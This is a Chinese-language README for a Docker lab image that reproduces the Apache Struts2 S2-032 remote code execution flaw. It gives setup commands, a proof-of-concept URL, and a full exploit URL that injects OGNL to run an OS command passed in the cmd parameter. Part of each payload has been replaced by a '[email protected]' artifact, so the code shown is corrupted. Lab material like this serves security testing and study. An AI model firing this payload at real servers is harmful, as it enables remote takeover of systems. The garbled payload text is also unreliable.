Struts2 S2-032 漏洞环境
说明
官方 demo 中提供的 war 包由于添加了 jsp 拦截器,配置会有问题,修正了一下。
漏洞信息
获取环境:
- 拉取镜像到本地
$ docker pull medicean/vulapps:s_struts2_s2-032
- 启动环境
$ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-032
-p 80:8080
前面的 80 代表物理机的端口,可随意指定。
使用与利用
访问 http://你的 IP 地址:端口号/
PoC
http://127.0.0.1/memoindex.action?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(%23parameters.content[0]%2b602%2b53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086
若页面显示:1008660253718
则代表可代码执行。
Exp
执行命令(所执行的命令在cmd参数处指定):
http://127.0.0.1/memoindex.action?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=id
改动日志
20160731
- 修正资源为本地路径
Comments